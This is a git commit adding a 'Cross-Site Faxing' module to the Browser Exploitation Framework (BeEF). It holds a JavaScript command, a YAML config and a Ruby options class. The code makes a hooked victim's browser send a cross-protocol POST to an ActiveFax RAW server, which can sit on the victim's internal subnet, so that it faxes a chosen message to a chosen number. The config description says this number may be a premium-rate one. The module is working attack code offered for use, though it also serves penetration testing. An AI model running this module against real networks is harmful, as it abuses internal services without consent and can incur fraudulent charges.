Merge pull request #949 from bmantra/master

add module for Cross-Site Faxing (XSF)
2013-11-29 12:10:11 -08:00
parent 513e61aff2 7afa52ec99
commit 8a90f37cd8
3 changed files with 107 additions and 0 deletions
--- a/modules/ipec/cross_site_faxing/command.js
+++ b/modules/ipec/cross_site_faxing/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var target_ip = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var recname = "<%= @recname %>";
+	var recfax = "<%= @recfax %>";
+	var subject = "<%= @subject %>";
+	var msg = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>";
+	
+	var uri = "http://"+target_ip+":"+target_port+"/";
+	var post_body = "@F201 "+recname+"@@F211 "+recfax+"@@F307 "+subject+"@@F301 1@\n"+msg;
+
+	var xhr = new XMLHttpRequest();	
+	
+	xhr.open("POST", uri, true);
+	xhr.setRequestHeader("Content-Type", "text/plain");
+	xhr.send(post_body);
+	setTimeout(function(){xhr.abort()}, 5000);
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
+
+});
+
--- a/modules/ipec/cross_site_faxing/config.yaml
+++ b/modules/ipec/cross_site_faxing/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        cross_site_faxing:
+            enable: true
+            category: "IPEC"
+            name: "Cross-Site Faxing (XSF)"
+            description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to ActiveFax RAW server socket (3000 by default) on the target specified in the 'Target Address' input field.  This module can send a FAX to a (premium) faxnumber via the ActiveFax Server.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+            authors: ["Bart Leppens"]
+            target:
+                working: ["all"]
--- a/modules/ipec/cross_site_faxing/module.rb
+++ b/modules/ipec/cross_site_faxing/module.rb
@@ -0,0 +1,64 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Cross_site_faxing < BeEF::Core::Command
+  
+  def self.options
+    return [
+	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
+	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '3000'},
+	{'name'=>'recname', 'ui_label' => 'Name of the receiver', 'value' => 'BeEF'},
+	{'name'=>'recfax', 'ui_label' => 'Fax number of the recipient', 'value' => '+1 11 112233-2'},
+	{'name'=>'subject', 'ui_label' => 'Subject', 'value' => 'Got some BeEF?'},
+	{'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"**********************************************************************
+
+                                     .O,
+                                     lkOl
+                                     od cOc
+                                     'X,  cOo.
+                                      cX,   ,dkc.
+              BeEF                     ;Kd.    ,odo,.
+                                        .dXl   .  .:xkl'
+                                          'OKc  .;c'  ,oOk:
+                                            ,kKo. .cOkc. .lOk:.
+                                              .dXx.  :KWKo. 'dXd.
+                                                .oXx.  cXWW0c..dXd.
+                                                  oW0   .OWWWNd.'KK.
+                                          ....,;lkNWx     KWWWWX:'XK.
+ ,o:,                          .,:odkO00XNK0Okxdlc,.     .KWWWWWWddWd
+  K::Ol                   .:d0NXK0OkxdoxO'             .lXWWWWWWWWKW0
+  od  d0.              .l0NKOxdooooooox0.        .,cdOXWWWWWWWWWWWWWx
+  :O   ;K;           ;kN0kooooooooooooK:  .':ok0NWWWWWWWWWWWWWWWWWWK.
+  'X    .Kl        ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd.
+  .N. o. .Kl     'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l.
+   0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:.
+   lX.,WN:  .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo.
+    0O.0WWk'   .XKoooooooooooONWWNo  dWWWWWWWWWWWWWWWWWl
+     oKkNWWWX00NWXdooooooooxXWWNk'   dWWWWWWWWWWWWWWWWX
+      .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW:
+         .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
+              'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd
+              oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO
+             ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx
+          ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
+         .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX'
+          :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk.
+         .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk'
+         OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl.
+        ,Wk  xWWWWWWWWd  xWWNWWWWWWWWWWWWXOdc,.
+        .N0   lOXNX0x;  .KWWWWWWWWWWWNkc.
+         :NO,         'lXWWWWWWWWWNk:.
+          .dXN0OkxkO0NWWWWWWWWWWKl.
+             .';o0WWWWWWWWWWWNk;
+                  .cxOKXKKOd;.
+
+**********************************************************************", 'width'=>'200px' }
+	]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end